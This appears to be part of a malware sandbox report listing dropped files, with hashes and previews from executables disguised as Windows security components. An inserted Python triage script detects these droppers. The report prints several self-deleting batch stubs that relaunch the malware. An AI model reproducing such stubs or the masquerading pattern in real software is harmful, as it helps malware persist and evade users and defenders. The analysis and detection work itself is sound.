                                                  Preview:NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..TITLE: New Tab - Google Chrome..PID: 4612..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..TITLE: New Tab - Google Chrome..PID: 3008..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..TITLE: New Tab - Google Chrome..PID: 2136..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..TITLE: New Tab - Google Chrome..PID: 6424..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..TITLE: New Tab - Google Chrome..PID: 5988..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmm
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                  Category:dropped
                                                  Size (bytes):96299
                                                  Entropy (8bit):7.851495961295097
                                                  Encrypted:false
                                                  SSDEEP:1536:COm0uT7hBWKeiJmfLtDFzUG0INKRCHVvTRaBKienvAHt3Tm2SmqdYak+OLS6:Xpti0PzTnNzHbikAHRTQBZX2
                                                  MD5:6AEF9BD3751EBB22DCE5F6772FC14C4E
                                                  SHA1:8B51AE657AA2453D2D676F1160D77C798335D986
                                                  SHA-256:E74D1F406B4F394B4CE27A9ED21B96B475B154A8D38E9CE3106C323CBEB6B117
                                                  SHA-512:DB643B5C4822D89948FC338901036F99B155259BDA8464C1B72BB593719672B5AC53E90DABC9C953B523944E123264A6103015893D887F7EC4B435225CB284BD
                                                  Malicious:false
                                                  Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.z..p.....MR...%.f..r.....Uf.....?.2......S.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-v.....Z..tN.Lo..?.Xb1....Oc....&...W.8.+.?.]._.....G.R....n..............z...........w..#.......`..
                                                  Process:C:\Users\user\Desktop\BTC.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):654
                                                  Entropy (8bit):5.380476433908377
                                                  Encrypted:false
                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                  Malicious:true
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                  Process:C:\Users\user\AppData\Roaming\Cracked.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):1281
                                                  Entropy (8bit):5.370111951859942
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                  MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                  SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                  SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                  SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                  Malicious:true
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                  Process:C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):654
                                                  Entropy (8bit):5.380476433908377
                                                  Encrypted:false
                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                  Process:C:\Users\user\AppData\Roaming\Windows Security Health Service.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):1281
                                                  Entropy (8bit):5.370111951859942
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                  MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                  SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                  SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                  SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                  Process:C:\Users\user\AppData\Roaming\Window Security.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1682
                                                  Entropy (8bit):5.350187081398599
                                                  Encrypted:false
                                                  SSDEEP:48:MIHK5HKH1qHiYHKh3okHZHKJHKntHo6hAHKzetTH3:Pq5qHwCYqh3ok5qJqntI6eqzIX
                                                  MD5:AE7F2402D6C6DD5CF582BB8A9AB7D8F0
                                                  SHA1:82E5A0C6F7F00154651327157E4BE6DF7AB3CEB6
                                                  SHA-256:2F09AEFCAFBB43457F64CDCD43992C51562214AC95CFAA7DEB0E9202E3E816A6
                                                  SHA-512:2FD6464EB55D5C175FE6C90AC1A037AAF0DD0B3ECDEA55862387436AF4D4833B1CCC763C19F80DCAF49D57D57B37087955EED5B7BF1B962FE9A4F7BE0D1DC5FE
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.Management.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127
                                                  Process:C:\Users\user\AppData\Roaming\crack.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):847
                                                  Entropy (8bit):5.345615485833535
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                  MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                  SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                  SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                  SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                  Malicious:true
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):15612
                                                  Entropy (8bit):5.0007665989277985
                                                  Encrypted:false
                                                  SSDEEP:384:d1VoGIpN6KQkj2qkjh4iUxehQVKoxOdBMNXp5rvOjJiYo0ib4J:d1V3IpNBQkj2Ph4iUxehYKoxOdBMNZd4
                                                  MD5:A8D66A40EEA8831B03CDC478ED797E6E
                                                  SHA1:F2DB655B7A8F6A211E8F6D95B50B3D7BC325F7CE
                                                  SHA-256:09178396408F3B27CBE725A8A455B37894EE4A3DBFCC34636DD23E96AB97C8CA
                                                  SHA-512:33C1DA734E45158C61EA1679202BAA3813C71901C9B5D481A09F244C9653C4DD76C1CD12378468579595C3C8CC92F60E868982BB26236841CDAE7BDB5B455C8F
                                                  Malicious:false
                                                  Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):2228
                                                  Entropy (8bit):5.373014386086601
                                                  Encrypted:false
                                                  SSDEEP:48:oqWSU4y4RQmFoUeWmfgZ9tK8NPdYm7u1iMugeC/ZaOUyu0lhV:oqLHyIFKL3IZ2KlROugg01
                                                  MD5:83DFEBBFB8AB0069D18959BB1907B085
                                                  SHA1:2AA838CE80E32C3B6AD34BA8C6691A71F48D9DFF
                                                  SHA-256:54793FA7498449A5092850936209DE978F4F34863512B319074A7059D6D3E2B5
                                                  SHA-512:12CC44ED34ED8DBE94F403D344A4490FBA72B6EB5A467AC7817D0DA0193277252DDD6CC8DF4B90BACD2B19FE31048E01BB312DDFDC7987B6C638B2510D80617D
                                                  Malicious:false
                                                  Preview:@...e................................................@..........P................1]...E.....m.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                  Process:C:\Users\user\AppData\Roaming\Window Security.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):211
                                                  Entropy (8bit):5.314820080166731
                                                  Encrypted:false
                                                  SSDEEP:6:hC47bxrBeLuVFOOr+DE19aZ5lSKOZG1923fah:d5r+uVEOCDEmHlIyh
                                                  MD5:4B18D354ACE04479EC8B40533E5CBB39
                                                  SHA1:80026CF84D5D014306289B4DE11FF97796EA3833
                                                  SHA-256:E3B58DED9CFF0870D23B825CE562C996922C59B22382011DCA68F9F39A380DCD
                                                  SHA-512:5088862A341DC2B00FD4F64EE28ED2AFC660BF4430BD6BEB8260B00D35219D7BFBA363B0AA90C7D65E81F2F25BCA4328BF748908577FA2E39437F933E13D6868
                                                  Malicious:false
                                                  Preview:@echo off..chcp 65001..echo DONT CLOSE THIS WINDOW!..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Roaming\Window Security.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\CMaYLAcPq0sZ.bat"
                                                  Process:C:\Users\user\AppData\Roaming\Window Security.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):211
                                                  Entropy (8bit):5.308857636881028
                                                  Encrypted:false
                                                  SSDEEP:6:hC47bxrBeLuVFOOr+DE19aZ5lSKOZG1923f5q:d5r+uVEOCDEmHlI0
                                                  MD5:D670354A665F570A3FF12D0F8D0352FB
                                                  SHA1:0DED94680F24878F50B5463346D2FAB9D828D550
                                                  SHA-256:CD4724D211DC73F1E6F6A5E464EC66877FC90627299A5F8E233C95AE16C1BC18
                                                  SHA-512:34C1FA39EBE7FBA6C0F8CE5F525C5B56FD7FFEB271EB1440988FECB42F8E388979F29AB83C0B9266D1F9F44ACB1184A59C5B63D3DE2C969B2098B03100CD9A6E
                                                  Malicious:false
                                                  Preview:@echo off..chcp 65001..echo DONT CLOSE THIS WINDOW!..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Roaming\Window Security.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\Dol1ysW8Xfj9.bat"
                                                  Process:C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe
                                                  File Type:Generic INItialization configuration [WIN]
                                                  Category:modified
                                                  Size (bytes):64
                                                  Entropy (8bit):3.6722687970803873
                                                  Encrypted:false
                                                  SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
                                                  MD5:DE63D53293EBACE29F3F54832D739D40
                                                  SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
                                                  SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
                                                  SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
                                                  Malicious:false
                                                  Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r
                                                  Process:C:\Users\user\AppData\Roaming\Window Security.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):211
                                                  Entropy (8bit):5.331098193307854
                                                  Encrypted:false
                                                  SSDEEP:6:hC47bxrBeLuVFOOr+DE19aZ5lSKOZG1923f/oh:d5r+uVEOCDEmHlInG
                                                  MD5:86EE14F4924A58CF80C2A794366DBA02
                                                  SHA1:52AE3C00D949E0B962CF8184D3410AEBF270C602
                                                  SHA-256:ADE9F487EC172EE9EBE9CB3A907D9985C665D0D5051FE7DD43831887507104B5
                                                  SHA-512:5FF6B56021BBE56404BFF8A74E612587A2B384C624B519F90D9997270B5E557F87A66CFD4A80A07033084E3B417FFD2E6CF6D8DEC68AE03A5FAD0CE3F76F29DF
                                                  Malicious:false
                                                  Preview:@echo off..chcp 65001..echo DONT CLOSE THIS WINDOW!..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Roaming\Window Security.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\Q83dEbLbhfIH.bat"
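Added example, not part of the Joe Sandbox report: a Python triage script that parses dropped-file records in the layout used above and flags two things the records show. First, the self-deleting batch stubs (delay via ping, relaunch the executable that dropped the batch, delete the .bat). Second, payloads carrying Windows security component names while running from a user-writable directory such as AppData\Roaming. Note that the sandbox marks the batch files themselves Malicious:false, so a triage that keys only on that flag misses the restart stub. The SAMPLE records are constructed from the entries above with the hash fields omitted; the field names, the ".." rendering of CRLF in previews and the "del /a /q /f" form follow the report. The keyword lists used for the look-alike check are this example's own assumption.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample: three records in the shape of the dropped-file entries above
# (process path, file type and preview taken from the report; hash fields omitted).
# The report renders each CRLF inside a text preview as "..".
SAMPLE = r'''
Process:C:\Users\user\AppData\Roaming\Window Security.exe
File Type:DOS batch file, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):211
Malicious:false
Preview:@echo off..chcp 65001..echo DONT CLOSE THIS WINDOW!..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Roaming\Window Security.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\CMaYLAcPq0sZ.bat"
Process:C:\Users\user\AppData\Roaming\crack.exe
File Type:CSV text
Category:dropped
Size (bytes):847
Malicious:true
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
'''

FIELDS = ("Process", "File Type", "Category", "Size (bytes)", "Entropy (8bit)", "Encrypted",
          "SSDEEP", "MD5", "SHA1", "SHA-256", "SHA-512", "Malicious", "Preview")


def parse_records(text):
    """One dict per dropped file; a record starts at each 'Process:' line.
    Values are split at the first colon only, so 'C:\\...' paths survive."""
    records = []
    for raw in text.splitlines():
        key, sep, value = raw.strip().partition(":")
        if not sep or key not in FIELDS:
            continue
        if key == "Process":
            records.append({})
        if records:
            records[-1][key] = value
    return records


def batch_commands(preview):
    """Split a batch preview into commands on the '..' CRLF marker. Only use on
    'DOS batch file' records: fusion-log CSV previews contain '0..1' where
    '..' is not a line break."""
    return [c.strip() for c in preview.split("..") if c.strip()]


DELAY_RE = re.compile(r"^(?:ping\s+-n\s+\d+\s+\S+|timeout\s+/t\s+\d+)", re.I)
START_RE = re.compile(r'^start\s+""\s+"([^"]+)"', re.I)
DEL_RE = re.compile(r'^del\s+(?:/[aqf]\s+)*"([^"]+\.bat)"', re.I)


def first_match(pattern, commands):
    for cmd in commands:
        m = pattern.match(cmd)
        if m:
            return m
    return None


def restart_batch_indicators(record):
    """Recognise the delay / start <exe> / del <self>.bat stub. Returns None when
    the record is not a batch file or any of the three stages is missing."""
    if "DOS batch file" not in record.get("File Type", ""):
        return None
    cmds = batch_commands(record.get("Preview", ""))
    delay, started, deleted = (first_match(p, cmds) for p in (DELAY_RE, START_RE, DEL_RE))
    if not (delay and started and deleted):
        return None
    target = started.group(1)
    return {
        "delay": delay.group(0),
        "restarts": target,
        "self_deletes": deleted.group(1),
        # the stub relaunches the very process that dropped it
        "relaunches_dropper": target.lower() == record.get("Process", "").lower(),
    }


# Assumed lists for this example: user-writable drop directories and name fragments
# that imitate Windows security components.
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\",
                 "\\programdata\\", "\\users\\public\\")
LOOKALIKE_WORDS = ("windows", "defender", "security", "microsoft", "svchost", "update")


def masquerades_as_system_component(process_path):
    """True for a Windows/Defender/Security-style file name executing from a
    user-writable directory; genuine components run from C:\\Windows or Program Files."""
    p = process_path.lower()
    name = PureWindowsPath(p).name
    return any(d in p for d in USER_WRITABLE) and any(w in name for w in LOOKALIKE_WORDS)


def triage(text):
    """Findings as (kind, path) tuples, independent of the per-file Malicious flag."""
    findings, seen = [], set()
    for rec in parse_records(text):
        proc = rec.get("Process", "")
        if masquerades_as_system_component(proc) and proc.lower() not in seen:
            seen.add(proc.lower())
            findings.append(("masquerading_dropper", proc))
        ind = restart_batch_indicators(rec)
        if ind:
            findings.append(("self_deleting_restart_batch", ind["self_deletes"]))
    return findings


if __name__ == "__main__":
    for kind, path in triage(SAMPLE):
        print(f"{kind}: {path}")
```

Run against the full report text, the same parser also sees the three batch records (L-numbered entries differ only in the temp file name, which the near-identical SSDEEP values already suggest) and the two differently named droppers in AppData\Roaming; the fusion-log and AppLocker-test records produce no finding because they are ordinary .NET and PowerShell side effects.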
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
